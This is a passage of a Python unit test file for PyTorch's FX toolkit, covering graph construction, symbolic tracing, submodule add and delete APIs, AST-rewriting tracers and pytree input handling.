graph = torch.fx.Graph()
x = torch.fx.Proxy(graph.placeholder('x'))
relu = torch.relu(x)
with graph.inserting_before(relu.node):
y = torch.neg(x)
z = torch.tanh(y)
graph.output((relu.node, z.node))
graph.lint()
expected_ops = ['x', 'neg', 'tanh', 'relu']
for node, expected in zip(graph.nodes, expected_ops):
assert expected in node.name
def test_reassign_args_kwargs_uses(self):
graph = torch.fx.Graph()
x, y = Proxy(graph.placeholder('x')), Proxy(graph.placeholder('y'))
z = x + y
zed = z + z + z
graph.output(zed.node)
graph.lint()
# zed = z + z + z -> zed = z + z + x
zed.node.args = (zed.node.args[0], x.node)
self.assertEqual(list(x.node.users.keys()), [z.node, zed.node])
# z = x + y -> z = y + y
z.node.args = (y.node, y.node)
self.assertEqual(list(x.node.users.keys()), [zed.node])
def test_trace_function(self):
def foo(x, y):
return torch.relu(x) + y
x, y = torch.randn(3, 4), torch.randn(3, 4)
self.checkGraphModule(foo, (x, y))
def test_trace_dict_int_keys(self):
class ModWithDictArg(torch.nn.Module):
def forward(self, d : Dict[int, torch.Tensor]):
return d[42]
class CallsModWithDict(torch.nn.Module):
def __init__(self):
super().__init__()
self.m = ModWithDictArg()
def forward(self, x):
return self.m({42: x})
class MyTracer(torch.fx.Tracer):
def is_leaf_module(self, m: torch.nn.Module, module_qualified_name : str) -> bool:
return isinstance(m, ModWithDictArg)
traced_graph = MyTracer().trace(CallsModWithDict())
def test_trace_dict_proxy_keys(self):
class ModWithDictArg(torch.nn.Module):
def forward(self, d : Dict[torch.Tensor, torch.Tensor]):
return d[42]
class CallsModWithDict(torch.nn.Module):
def __init__(self):
super().__init__()
self.m = ModWithDictArg()
def forward(self, x):
return self.m({x: x})
class MyTracer(torch.fx.Tracer):
def is_leaf_module(self, m: torch.nn.Module, module_qualified_name : str) -> bool:
return isinstance(m, ModWithDictArg)
with self.assertRaisesRegex(RuntimeError, 'cannot contain a Node'):
traced_graph = MyTracer().trace(CallsModWithDict())
def test_module_deepcopy_edit_nodes(self):
class Foo(torch.nn.Module):
def forward(self, x):
return torch.relu(x)
traced1 = symbolic_trace(Foo())
copied = copy.deepcopy(traced1)
for node in copied.graph.nodes:
if node.target == torch.relu:
node.target = torch.neg
copied.recompile()
traced1.recompile()
x = torch.randn(15, 15)
torch.testing.assert_allclose(traced1(x), torch.relu(x))
torch.testing.assert_allclose(copied(x), torch.neg(x))
def test_direct_param_use(self):
class TransposeTest(torch.nn.Module):
def __init__(self):
super().__init__()
self.b = torch.nn.Parameter(torch.rand(4, 3))
def forward(self, x):
return self.b
class Foo(torch.nn.Module):
def __init__(self):
super().__init__()
self.a = TransposeTest()
def forward(self, x):
return self.a.b, self.a.b.t(), self.a.b.view(12)
traced = torch.fx.symbolic_trace(Foo())
assert(all('constant' not in node.target for node in traced.graph.nodes))
def test_single_default_arg(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
def forward(self, y=1):
return y
m = M()
self.checkGraphModule(m, ())
self.checkGraphModule(m, (3,))
def test_multiple_default_args(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
def forward(self, y=1, z=2):
return y + z
m = M()
self.checkGraphModule(m, ())
self.checkGraphModule(m, (3,))
self.checkGraphModule(m, (3, 4))
def test_regular_and_default_args(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
def forward(self, x, y=1):
return x + y
m = M()
self.checkGraphModule(m, (2,))
self.checkGraphModule(m, (2, 3))
def test_string_literal_return(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
def forward(self):
return "foo"
m = M()
self.checkGraphModule(m, ())
def test_namedtuple_return_qualname(self):
class NamedTupReturn(torch.nn.Module):
def forward(self, x):
return MyNamedTup(x, x)
traced = symbolic_trace(NamedTupReturn())
input = torch.rand(3, 4)
self.assertEqual(traced(input), MyNamedTup(input, input))
def test_update_args_kwargs_yells_at_you(self):
symtraced = symbolic_trace(SimpleTest())
node = next(iter(symtraced.graph.nodes))
with self.assertRaisesRegex(AttributeError, '__update_args_kwargs'):
node.__update_args_kwargs((), {})
def test_torchbind_class_attribute_in_fx(self):
if TEST_WITH_ROCM or IS_FBCODE or IS_WINDOWS or IS_MACOS:
self.skipTest("torch.classes._TorchScriptTesting._StackString is registered, skipping")
class FooBar1234(torch.nn.Module):
def __init__(self):
super(FooBar1234, self).__init__()
self.f = torch.classes._TorchScriptTesting._StackString(["3", "4"])
def forward(self):
return self.f.top()
m = FooBar1234()
self.checkGraphModule(m, ())
def test_torchbind_class_attribute_in_fx_tensor_arg(self):
if TEST_WITH_ROCM or IS_FBCODE or IS_WINDOWS or IS_MACOS:
self.skipTest("torch.classes._TorchScriptTesting._ReLUClass is registered, skipping")
class FooBar2341(torch.nn.Module):
def __init__(self):
super(FooBar2341, self).__init__()
self.f = torch.classes._TorchScriptTesting._ReLUClass()
def forward(self, x):
return self.f.run(x)
m = FooBar2341()
traced = symbolic_trace(m)
input = torch.randn(3, 4)
self.assertEqual(traced(input), m(input))
self.assertTrue(any(n.op == 'call_method' for n in traced.graph.nodes))
def test_script_method_trace(self):
class Scripted(torch.nn.Module):
def forward(self, x):
return torch.relu(x)
class Holder(torch.nn.Module):
def __init__(self):
super().__init__()
self.s = torch.jit.script(Scripted())
def forward(self, x):
return self.s(x)
h = Holder()
traced = symbolic_trace(h)
input = torch.randn(3, 4)
self.assertEqual(traced(input), h(input))
self.assertTrue(any(n.op == 'call_method' for n in traced.graph.nodes))
def test_namedtuple_return_trace(self):
class NamedTupReturn(torch.nn.Module):
def forward(self, x):
return Pair(x, x)
traced = symbolic_trace(NamedTupReturn())
input = torch.rand(3, 4)
self.assertEqual(traced(input), Pair(input, input))
def test_named_tuple_inlined(self):
class NamedTupMod(torch.nn.Module):
def forward(self, inp):
return wrapped_named_tup(Pair(inp, 1.2), p2=Pair(3.4, inp))
m = NamedTupMod()
input = torch.rand(3, 4)
ref = m(input)
traced = symbolic_trace(m)
res = traced(input)
self.assertEqual(ref, res)
# Check Pair NamedTuple works when inlined into the function call.
ph = call_func = None
for node in traced.graph.nodes:
if node.op == "placeholder":
ph = node
elif node.op == "call_function" and node.target == wrapped_named_tup:
node.update_arg(0, Pair(ph, 1.2))
node.update_kwarg("p2", Pair(3.4, ph))
call_func = node
break
self.assertTrue(call_func is not None)
self.assertTrue(isinstance(call_func.args[0], Pair))
self.assertTrue(isinstance(call_func.kwargs["p2"], Pair))
self.assertEqual(_format_arg(call_func.args[0]), "Pair(x=%inp, y=1.2)")
self.assertEqual(_format_arg(call_func.kwargs["p2"]), "Pair(x=3.4, y=%inp)")
traced.graph.eliminate_dead_code()
traced.recompile()
res = traced(input)
self.assertEqual(ref, res)
def test_return_type_exists(self):
class ReturnTypeModule(torch.nn.Module):
def other(self, x: List[str]) -> List[str]:
return x
def forward(self, x: List[str]) -> List[str]:
return self.other(x)
traced = symbolic_trace(ReturnTypeModule())
self.assertIn("-> typing_List[str]", traced._code)
scripted = torch.jit.script(traced)
self.assertIn("-> List[str]", scripted.code)
def getitem_inner(self):
class GetItemBase(torch.nn.Module):
def __init__(self):
super().__init__()
self.register_buffer('pe', torch.randn(8, 8))
class GetItem1(GetItemBase):
def forward(self, x):
return self.pe[:, :x.size(0)]
class GetItem2(GetItemBase):
def forward(self, x):
return self.pe[x.size(0)]
class GetItem3(GetItemBase):
def forward(self, x):
return self.pe[4] # fx creates `self._tensor_constant0` here
self.checkGraphModule(GetItem1(), [torch.zeros(4)])
self.checkGraphModule(GetItem2(), [torch.zeros(4)])
self.checkGraphModule(GetItem3(), [torch.zeros(4)])
@unittest.skipUnless(os.environ.get("FX_PATCH_GETITEM") == "1",
"Will be checked in test_getitem_subproc")
def test_getitem(self):
self.getitem_inner()
def test_getitem_subproc(self):
# need to run this test in a subproc to work around:
# https://github.com/pytorch/pytorch/issues/50710
proc = Process(target=run_getitem_target)
proc.start()
proc.join()
self.assertEqual(proc.exitcode, 0)
def test_user_friendly_call_provenance_with_function(self):
def fn(x):
return wrapper_fn(x)
traced = torch.fx.symbolic_trace(fn)
with self.assertRaisesRegex(RuntimeError, "'wrapper_fn' is "
"being compiled since it was called"
" from 'fn.forward'"):
scripted = torch.jit.script(traced)
def test_user_friendly_call_provenance_with_module(self):
class M(torch.nn.Module):
def forward(self, x):
return wrapper_fn(x)
traced = torch.fx.symbolic_trace(M())
with self.assertRaisesRegex(RuntimeError, "'wrapper_fn' is "
"being compiled since it was called"
" from 'M.forward'"):
scripted = torch.jit.script(traced)
def test_snake_case(self):
class M(torch.nn.Module):
def __init__(self):
super(M, self).__init__()
self.activations = torch.nn.ModuleDict([
["snake_case", torch.nn.ReLU()],
["PascalCase", torch.nn.LeakyReLU()],
["ALL_CAPS", torch.nn.PReLU()]
])
def forward(self, x):
a = self.activations["snake_case"](x)
b = self.activations["PascalCase"](x)
c = self.activations["ALL_CAPS"](x)
return a, b, c
traced = symbolic_trace(M())
check = [
("activations_snake_case", "activations.snake_case"),
("activations_pascal_case", "activations.PascalCase"),
("activations_all_caps", "activations.ALL_CAPS")
]
i = 0
for node in traced.graph.nodes:
if node.op == "placeholder" or node.op == "output":
continue
name = check[i][0]
target = check[i][1]
self.assertEqual(name, node.name)
self.assertEqual(target, node.target)
i += 1
self.assertEqual(i, 3)
def test_no_mutation(self):
from torch.fx.immutable_collections import immutable_list
x = immutable_list([3, 4])
with self.assertRaisesRegex(NotImplementedError, "new_args"):
x[0] = 4
def test_partial_trace(self):
class Foo(torch.nn.Module):
def forward(self, x, y):
if y:
return 2 * x
else:
return x
mod = Foo()
mod_true = symbolic_trace(mod, concrete_args={'y': True})
mod_false = symbolic_trace(mod, concrete_args={'y': False})
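# concrete_args specializes the trace on the supplied value of y; FX also records
# torch._assert guards, so each specialized module only accepts that value (checked below).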
self.assertEqual(mod_true(3, True), 6)
print(mod_true.code)
assert(any([i.target == torch._assert for i in mod_true.graph.nodes]))
with self.assertRaises(AssertionError):
mod_true(3, False)
self.assertEqual(mod_false(3, False), 3)
with self.assertRaises(AssertionError):
mod_false(3, True)
def f_higher(a, f):
return f(a)
nf = symbolic_trace(f_higher, concrete_args={'f': lambda x: x * 2})
self.assertEqual(nf(3, lambda x: x * 2), 6)
def test_custom_traceback_raised_when_exception_source_is_graphmodule(self):
class M(torch.nn.Module):
def __init__(self):
super(M, self).__init__()
self.W = torch.nn.Parameter(torch.randn(5))
def forward(self, x):
return torch.dot(self.W, x)
traced = torch.fx.symbolic_trace(M())
out = [n for n in traced.graph.nodes if n.op == "output"][-1]
with traced.graph.inserting_before(out):
relu_out = traced.graph.call_method(method_name='relu',
args=(out.args[0],))
out.args = (relu_out,)
traced.recompile()
with self.capture_stderr() as captured:
with self.assertRaises(TypeError):
traced(5)
self.assertRegex(captured[0],
r"Call using an FX-traced Module, line .* of the "
r"traced Module's generated forward function:")
def test_custom_traceback_not_raised_when_exception_source_is_submodule(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
self.linear = torch.nn.Linear(3, 4)
def forward(self, x):
return self.linear(x)
traced = torch.fx.symbolic_trace(M())
# Do not change this to `capture_stderr` or another context
# manager without ensuring that the output is as expected
try:
traced(torch.rand(5, 5))
except RuntimeError:
captured = traceback.format_exc()
self.assertNotRegex(captured,
r"Call using an FX-traced Module, line .* of the "
r"traced Module's generated forward function:")
def test_graph_module_replicate_for_dp(self):
class Foo(torch.nn.Module):
def forward(self, x):
return torch.relu(x)
gm = torch.fx.symbolic_trace(Foo())
x = torch.randn(5, 3)
out = gm(x)
replica = gm._replicate_for_data_parallel()
out_replica = replica(x)
torch.testing.assert_allclose(out_replica, out)
def test_ast_rewriter_rewrites_assert(self):
class M(torch.nn.Module):
def forward(self, x: torch.Tensor, y: int, z: int):
assert y == z
return torch.add(x, x)
ast_rewriter = RewritingTracer()
graph = ast_rewriter.trace(M())
traced = GraphModule(ast_rewriter.root, graph, "gm")
traced.graph.lint()
def test_ast_rewriter_rewrites_assert_with_message(self):
class M(torch.nn.Module):
def forward(self, x: torch.Tensor, y: int, z: int):
assert y == z, "msg"
return torch.add(x, x)
ast_rewriter = RewritingTracer()
graph = ast_rewriter.trace(M())
traced = GraphModule(ast_rewriter.root, graph, "gm")
traced.graph.lint()
def test_throw_out_variant(self):
def foo(x):
y = torch.rand_like(x)
torch.sigmoid(x, out=y)
return y
class MyTracer(torch.fx.Tracer):
check_mutable_operations = True
tracer = MyTracer()
with self.assertRaisesRegex(RuntimeError, 'mutable operation aten::sigmoid.out'):
traced_graph = tracer.trace(foo)
def test_ast_rewriter_reassigns_submodules(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
self.bn = torch.nn.BatchNorm2d(100)
def forward(self, x: torch.Tensor):
return torch.add(x, x)
ast_rewriter = RewritingTracer()
graph = ast_rewriter.trace(M())
traced = GraphModule(ast_rewriter.root, graph, "gm")
traced.graph.lint()
def test_ast_rewriter_wrap(self):
self.assertEqual(3 + 4 + 5, a_lifted_leaf((3, 4), 5))
def to_trace(y):
return (
a_lifted_leaf((4, y), 3)
+ a_lifted_leaf((3, 4), 5)
+ a_lifted_leaf((y, y), y)
)
ast_rewriter = RewritingTracer()
graph = ast_rewriter.trace(to_trace)
traced = GraphModule(ast_rewriter.root, graph, "gm")
self.assertIn("a_lifted_leaf", traced.code)
self.assertEqual(27, traced(2))
self.assertIs(a_lifted_leaf, real_a_lifed_leaf)
def test_ast_rewriter_wrap_fn_directly(self):
self.assertEqual(3 + 4 + 5, a_lifted_leaf2((3, 4), 5))
def to_trace(y):
return (
a_lifted_leaf2((4, y), 3)
+ a_lifted_leaf2((3, 4), 5)
+ a_lifted_leaf2((y, y), y)
)
ast_rewriter = RewritingTracer()
graph = ast_rewriter.trace(to_trace)
traced = GraphModule(ast_rewriter.root, graph, "gm")
self.assertIn("a_lifted_leaf2", traced.code)
self.assertEqual(27, traced(2))
self.assertIs(a_lifted_leaf2, real_a_lifed_leaf2)
def test_profiler_ranges_side_effect(self):
g = torch.fx.Graph()
handle = g.call_function(torch.ops.profiler._record_function_enter, ('test_range',))
g.call_function(torch.ops.profiler._record_function_exit, (handle,))
g.output(None)
found_targets = {}
for node in g.nodes:
if node.op == 'call_function':
found_targets.setdefault(node.target)
self.assertEqual(
list(found_targets.keys()),
[torch.ops.profiler._record_function_enter, torch.ops.profiler._record_function_exit]
)
g.eliminate_dead_code()
found_targets = {}
for node in g.nodes:
if node.op == 'call_function':
found_targets.setdefault(node.target)
self.assertEqual(
list(found_targets.keys()),
[torch.ops.profiler._record_function_enter, torch.ops.profiler._record_function_exit]
)
def test_ast_rewriter_wrapped_via_decorator(self):
class F(torch.nn.Module):
def forward(self, x):
return wrapped_via_decorator(x)
ast_rewriter = RewritingTracer()
graph = ast_rewriter.trace(F())
traced = GraphModule(ast_rewriter.root, graph, "gm")
self.assertIn("wrapped_via_decorator", traced.code)
self.assertEqual(traced(0), 1)
self.assertIs(wrapped_via_decorator, real_wrapped_via_decorator)
self.assertFalse(hasattr(wrapped_via_decorator, "__fx_already_patched"))
def test_ast_rewriter_wrapped_via_decorator_and_transformed(self):
self.assertEqual(wrapped_via_decorator(0), 1)
def to_trace(y):
return wrapped_via_decorator(y)
ast_rewriter = RewritingTracer()
graph = ast_rewriter.trace(to_trace)
traced = GraphModule(ast_rewriter.root, graph, "gm")
self.assertIn("wrapped_via_decorator", traced.code)
self.assertEqual(traced(0), 1)
self.assertIs(wrapped_via_decorator, real_wrapped_via_decorator)
self.assertFalse(hasattr(wrapped_via_decorator, "__fx_already_patched"))
transformed = torch.fx.Transformer(traced).transform()
self.assertIn("wrapped_via_decorator", transformed.code)
self.assertEqual(transformed(0), 1)
self.assertIs(wrapped_via_decorator, real_wrapped_via_decorator)
self.assertFalse(hasattr(wrapped_via_decorator, "__fx_already_patched"))
def test_ast_rewriter_wrap_with_submodule(self):
class M(torch.nn.Module):
def __init__(self):
super(M, self).__init__()
self.batchnorm1d = torch.nn.BatchNorm1d(2, affine=False)
def forward(self, x: torch.Tensor):
return wrapped_with_submodule(x, self.batchnorm1d)
ast_rewriter = RewritingTracer()
graph = ast_rewriter.trace(M())
traced = GraphModule(ast_rewriter.root, graph, "gm")
self.assertIn("wrapped_with_submodule", traced.code)
input = torch.rand(3, 2)
ref_batchnorm1d = torch.nn.BatchNorm1d(2, affine=False)
self.assertEqual(ref_batchnorm1d(input), traced(input))
def test_submodule_manipulation_API(self):
class C(torch.nn.Module):
def __init__(self):
super(C, self).__init__()
self.conv = torch.nn.Conv2d(16, 33, 3, stride=2)
self.param = torch.nn.Parameter(torch.rand(2, 3))
def forward(self, x):
return self.conv(torch.cat([self.param, x]))
class B(torch.nn.Module):
def __init__(self):
super(B, self).__init__()
self.linear = torch.nn.Linear(100, 200)
self.register_buffer("buf", torch.randn(2, 3))
self.net_c = C()
def forward(self, x):
return self.linear(torch.cat([self.buf, self.net_c(x)]))
class A(torch.nn.Module):
def __init__(self):
super(A, self).__init__()
self.net_b = B()
self.param = torch.nn.Parameter(torch.rand(2, 3))
def forward(self, x):
return self.net_b(x) + self.param
a = symbolic_trace(A())
a.add_submodule("net_b.net_c.dropout", torch.nn.Dropout(p=0.2))
conv = [n for n in a.graph.nodes if n.target == "net_b.net_c.conv"][-1]
with a.graph.inserting_before(conv):
with warnings.catch_warnings(record=True) as w:
dropout = a.graph.call_module(module_name="net_b.net_c.dropout",
args=conv.args)
self.assertEqual(len(w), 0)
conv.replace_all_uses_with(dropout)
a.graph.erase_node(conv)
a.recompile()
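# Typical graph-surgery sequence: insert the replacement call_module node, redirect every
# user of the old node with replace_all_uses_with, erase the now-unused node, then
# recompile so the generated forward matches the edited graph.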
def module_exists(gm: GraphModule, path: str) -> bool:
return any(path == name for name, _ in gm.named_modules())
def parameter_exists(gm: GraphModule, path: str) -> bool:
return (any(path == name for name, _ in gm.named_parameters())
and any(path == name for name in gm.state_dict().keys()))
def buffer_exists(gm: GraphModule, path: str) -> bool:
return (any(path == name for name, _ in gm.named_buffers())
and any(path == name for name in gm.state_dict().keys()))
# Test that we added the "dropout" submodule
self.assertTrue(module_exists(a, "net_b.net_c.dropout"))
# Test `get_submodule` with an added submodule
self.assertIsNotNone(a.get_submodule("net_b.net_c.dropout"))
# Test that the "conv" submodule is still there
self.assertTrue(module_exists(a, "net_b.net_c.conv"))
# Test `get_submodule` with an original module
self.assertIsNotNone(a.get_submodule("net_b.net_c.conv"))
# Test that the "conv" node is NOT still there
conv = [n for n in a.graph.nodes if n.target == "net_b.net_c.conv"]
self.assertEqual(conv, [])
a.delete_submodule("net_b.net_c.conv")
# Test that the "conv" submodule is now gone
self.assertFalse(module_exists(a, "net_b.net_c.conv"))
# Test `get_submodule` with a deleted submodule
with self.assertRaisesRegex(AttributeError, "has no attribute "
"`conv`"):
self.assertIsNone(a.get_submodule("net_b.net_c.conv"))
# Test `get_attr` warnings
cat = [n for n in a.graph.nodes if n.target == torch.cat][-1]
with a.graph.inserting_before(cat):
with warnings.catch_warnings(record=True) as w:
param = a.graph.get_attr(qualified_name="net_b.net_c.param")
self.assertEqual(len(w), 0)
with self.assertWarnsRegex(UserWarning, "Attempted to "
"insert a get_attr Node with no "
"underlying reference in the "
"owning GraphModule"):
bad_param = a.graph.get_attr(qualified_name="net_b.param")
a.graph.erase_node(bad_param)
cat.args = (*cat.args, param)
a.recompile()
a.graph.lint()
# Test `get_parameter`
a.get_parameter("net_b.net_c.param")
with self.assertRaisesRegex(AttributeError, "is not an "
"nn.Parameter"):
a.get_parameter("net_b.buf")
with self.assertRaisesRegex(AttributeError, "has no attribute "
"`param`"):
a.get_parameter("net_b.param")
# Test `get_buffer`
a.get_buffer("net_b.buf")
with self.assertRaisesRegex(AttributeError, "is not a "
"buffer"):
a.get_buffer("net_b.net_c.param")
with self.assertRaisesRegex(AttributeError, "has no attribute "
"`buf`"):
a.get_buffer("net_b.net_c.buf")
# Test non-nested attributes
a.get_submodule("")
a.get_parameter("param")
# Insert some unused submodules
a.add_submodule("net_b.embedding", torch.nn.Embedding(10, 3))
a.add_submodule("net_b.net_c.embedding", torch.nn.Embedding(10, 3))
a.add_submodule("net_b.net_c.rnn", torch.nn.RNN(10, 20, 2))
a.add_submodule("batch_norm_2d", torch.nn.BatchNorm2d(100))
# Garbage collection
a.delete_all_unused_submodules()
# Test that all the unused submodules are gone
self.assertFalse(module_exists(a, "net_b.embedding"))
self.assertFalse(module_exists(a, "net_b.net_c.embedding"))
self.assertFalse(module_exists(a, "net_b.net_c.rnn"))
self.assertFalse(module_exists(a, "batch_norm_2d"))
# Test that we didn't delete any unused Parameters or buffers
self.assertTrue(parameter_exists(a, "net_b.net_c.param"))
self.assertTrue(buffer_exists(a, "net_b.buf"))
a.graph.lint()
def test_delete_unused_submodules_leaf(self):
class SubModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.linear = torch.nn.Linear(10, 10)
self.relu = torch.nn.ReLU()
def forward(self, x):
x = self.linear(x)
x = self.relu(x)
return x
class Model(torch.nn.Module):
def __init__(self):
super().__init__()
self.submod = SubModule()
def forward(self, x):
x = self.submod(x)
return x
model = Model()
class MyCustomTracer(torch.fx.Tracer):
def is_leaf_module(self, m: torch.nn.Module, module_qualified_name : str) -> bool:
return module_qualified_name == "submod"
inputs = torch.randn(1, 10)
traced_graph = MyCustomTracer().trace(model)
gm2 = torch.fx.GraphModule(model, traced_graph)
gm2.delete_all_unused_submodules()
torch.testing.assert_allclose(gm2(inputs), model(inputs))
def test_tracing_graphmodules_as_leaf_submodules(self):
class A(torch.nn.Module):
def forward(self, t):
return t + t
class B(torch.nn.Module):
def __init__(self):
super(type(self), self).__init__()
self.calling = False
self.called = False
def forward(self, t):
if self.calling:
return t - t
else:
return t + t
def __call__(self, *args):
self.called = True
self.calling = True
return super(type(self), self).__call__(*args)
self.calling = False
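# Note: the assignment above is unreachable because __call__ returns on the previous line,
# so `calling` stays True after the first invocation.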
class M(torch.nn.Module):
def __init__(self, a, b):
super().__init__()
self.a = a
self.b = b
def forward(self, t):
x = self.a(t)
y = self.b(t)
return x + y
class LeafTracer(Tracer):
def is_leaf_module(self, module, name):
return True
class LeafTracerNotB(Tracer):
def is_leaf_module(self, module, name):
return False if "b" in name else True
# Recompile calls added "for fun", since they
# chain __call__ wrappers.
#
# Test: B as a regular, non-leaf module
#
a = symbolic_trace(A())
a.recompile()
m = M(a, B())
graph = LeafTracerNotB().trace(m)
gm = GraphModule(m, graph)
gm.recompile()
# Test graphmodule/submodule a is not inlined.
self.assertTrue(isinstance(gm.get_submodule("a"), GraphModule))
match = [n for n in gm.graph.nodes if n.op == "call_module" and n.target == "a"]
self.assertTrue(len(match) == 1)
# Test submodule b is not treated as leaf.
self.assertFalse(hasattr(gm, "b"))
# Test assert custom __call__ on submodule b was honored.
match = [
n
for n in gm.graph.nodes
if n.op == "call_function" and n.target == operator.sub
]
self.assertTrue(len(match) == 1)
#
# Test: B as a regular, leaf module
# symbolic_trace should only patch torch.nn.Module.__call__,
# which means B.__call__ should still execute
#
a = symbolic_trace(A())
a.recompile()
b = B()
m = M(a, b)
graph = LeafTracer().trace(m)
gm = GraphModule(m, graph)
gm.recompile()
# Test graphmodule/submodule a is not inlined.
self.assertTrue(isinstance(gm.get_submodule("a"), GraphModule))
match = [n for n in gm.graph.nodes if n.op == "call_module" and n.target == "a"]
self.assertTrue(len(match) == 1)
# Test submodule b is leaf:
self.assertTrue(isinstance(gm.get_submodule("b"), torch.nn.Module))
match = [n for n in gm.graph.nodes if n.op == "call_module" and n.target == "b"]
self.assertTrue(len(match) == 1)
# Test b.__call__ was run
self.assertTrue(b.called)
self.assertTrue(gm.get_submodule("b").called)
#
# Test: B as GraphModule leaf
# __call__ not honored since symbolic_trace directly invokes forward()
#
a = symbolic_trace(A())
a.recompile()
b = symbolic_trace(B())
b.recompile()
m = M(a, b)
graph = LeafTracer().trace(m)
gm = GraphModule(m, graph)
gm.recompile()
self.assertTrue(isinstance(gm.get_submodule("a"), GraphModule))
match = [n for n in gm.graph.nodes if n.op == "call_module" and n.target == "a"]
self.assertTrue(len(match) == 1)
self.assertTrue(isinstance(gm.get_submodule("b"), torch.nn.Module))
match = [n for n in gm.graph.nodes if n.op == "call_module" and n.target == "b"]
self.assertTrue(len(match) == 1)
def _test_graph_module_init_buffer_param_copied(self, use_dict_init: bool):
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.register_buffer("my_buff", torch.rand(3, 4))
self.register_parameter(
"my_param", torch.nn.Parameter(torch.rand(3, 4))
)
def forward(self, x):
return x + self.my_buff + self.my_param
mod = MyModule()
mod_traced = symbolic_trace(mod)
# Create new GraphModule based on original, either w/ dict or root module.
orig_buff = mod_traced.get_buffer("my_buff")
orig_param = mod_traced.get_parameter("my_param")
mod_traced_new = GraphModule(
{"my_buff": orig_buff, "my_param": orig_param} if use_dict_init else mod,
mod_traced.graph,
)
# Check that both my_buff and my_param are found and the same.
try:
new_buff = mod_traced_new.get_buffer("my_buff")
except Exception:
self.fail("Did not find my_buff")
self.assertEqual(orig_buff, new_buff)
try:
new_param = mod_traced_new.get_parameter("my_param")
except Exception:
self.fail("Did not find my_param")
self.assertEqual(orig_param, new_param)
x = torch.rand(3, 4)
orig_out = mod_traced(x)
submodules_out = mod_traced_new(x)
self.assertEqual(orig_out, submodules_out)
def test_graph_module_init_buffer_param_copied_dict_init(self):
self._test_graph_module_init_buffer_param_copied(use_dict_init=True)
def test_graph_module_init_buffer_param_copied_mod_init(self):
self._test_graph_module_init_buffer_param_copied(use_dict_init=False)
def test_annotations_with_no_forward_references(self):
class A:
def __call__(self, x: torch.Tensor):
return torch.add(x, x)
class M(torch.nn.Module):
def forward(self, x: torch.Tensor, a: A) -> torch.Tensor:
return a(x)
self.checkGraphModule(M(), (torch.rand(2, 3), A()), kwargs=None)
def test_annotations_with_forward_references(self):
class A:
def __call__(self, x: torch.Tensor):
return torch.add(x, x)
class M(torch.nn.Module):
def forward(self, x: 'torch.Tensor', a: 'A') -> 'torch.Tensor':
return a(x)
self.checkGraphModule(M(), (torch.rand(2, 3), A()), kwargs=None)
def test_annotations_with_non_torch_reference_and_no_internal_forward_references(self):
class A:
def __call__(self, x: torch.Tensor):
return torch.add(x, x)
class M(torch.nn.Module):
def forward(self, x: List[torch.Tensor], a: A) -> torch.Tensor:
return a(x[0])
self.checkGraphModule(M(), (torch.rand(2, 3), A()), kwargs=None)
def test_annotations_with_non_torch_reference_and_internal_forward_references(self):
class A:
def __call__(self, x: torch.Tensor):
return torch.add(x, x)
class M(torch.nn.Module):
def forward(self, x: List['torch.Tensor'], a: A) -> 'torch.Tensor':
return a(x)[0]
self.checkGraphModule(M(), (torch.rand(2, 3), A()), kwargs=None)
@unittest.skipIf(sys.version_info < (3, 7), "`__future__` feature "
"`annotations` is not defined in Python <3.7")
def test_annotation_with_future(self):
try:
import fx.test_future # noqa: F401
finally:
del sys.modules["__future__"]
def test_annotations_empty_tuple(self):
class Foo(torch.nn.Module):
def forward(self, x: Tuple[()], y: Tuple[str, Tuple[()]]):
return "foo"
traced = torch.fx.symbolic_trace(Foo())
x = ()
y = ("bar", ())
traced(x, y)
FileCheck().check("_Tuple[()]") \
.check("typing_Tuple[str,typing_Tuple[()]]") \
.run(traced.code)
scripted = torch.jit.script(traced)
scripted(x, y)
FileCheck().check("Tuple[()]") \
.check("Tuple[str, Tuple[()]]") \
.run(scripted.code)
@unittest.skipIf(IS_WINDOWS, "Python Windows bug? https://bugs.python.org/issue45108")
def test_assert(self):
def f(x):
assert x > 1
return x + 1
try:
torch.fx.proxy.TracerBase.trace_asserts = True
traced = symbolic_trace(f)
finally:
torch.fx.proxy.TracerBase.trace_asserts = False
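# trace_asserts is a class-level flag on TracerBase, so the try/finally restores the default
# even if tracing fails; with it enabled the assert is recorded in the graph and the traced
# function raises AssertionError at runtime (checked below).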
self.assertEqual(f(2), traced(2))
with self.assertRaises(AssertionError):
traced(0)
def test_pytree(self):
def f_sum(x):
return sum(x)
def f_sum_dict(x):
out = 0
for k, v in x.items():
out += v
return out
def f_dict_list_map(x):
new_dict = {}
for k, v in x.items():
new_dict[k] = [i + 1 for i in v]
return new_dict
def f_dict_add(x):
return x['a'] + sum(x['z'])
def f_namedtuple_add(x):
return x.x + x.y
pytree._register_pytree_node(
Foo,
lambda x: ([x.a, x.b], None),
lambda x, _: Foo(x[0], x[1]),
)
fx_pytree.register_pytree_flatten_spec(Foo, lambda x, _: [x.a, x.b])
def f_custom(x):
return x.a + x.b
def f_custom_dict(x):
return f_sum_dict(x.a) + x.b
def f_return_custom(x):
return Foo(x.b, x.a)
tests = [
(f_sum, [PH, PH, PH]),
(f_sum, []),
(f_sum_dict, {'a': PH, 'b': PH, 'c': PH}),
(f_dict_list_map, {'a': (PH, PH), 'b': [PH], 'c': []}),
(f_dict_list_map, {5: (PH, PH, PH)}),
(f_dict_add, {'a': PH, 'z': (PH, PH, PH)}),
(f_dict_add, {'a': PH, 'z': []}),
(f_custom, Foo(PH, PH)),
(f_custom, Foo(PH, 3)),
(f_custom_dict, Foo({'a': PH, 'b': PH}, PH)),
# (f_return_custom, Foo(PH, PH)), # Don't currently support output pytrees
(f_namedtuple_add, Point(PH, PH)),
]
def verify_pytree(f, inp):
val = pytree.tree_map(lambda x: torch.randn(3) if x == PH else x, inp)
num_flat_args = len([i == PH for i in pytree.tree_flatten(inp)[0]])
orig_out = f(val)
nf = symbolic_trace(f, concrete_args={'x': inp})
self.assertEqual(nf(val), orig_out)
bare_fx = GraphModule({}, copy.deepcopy(nf.graph))
bare_fx.graph.set_codegen(CodeGen())
bare_fx.recompile()
self.assertEqual(nf.graph.process_outputs(bare_fx(*nf.graph.process_inputs(val))), orig_out)
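# nf.graph still carries the pytree codegen, so process_inputs flattens the structured input
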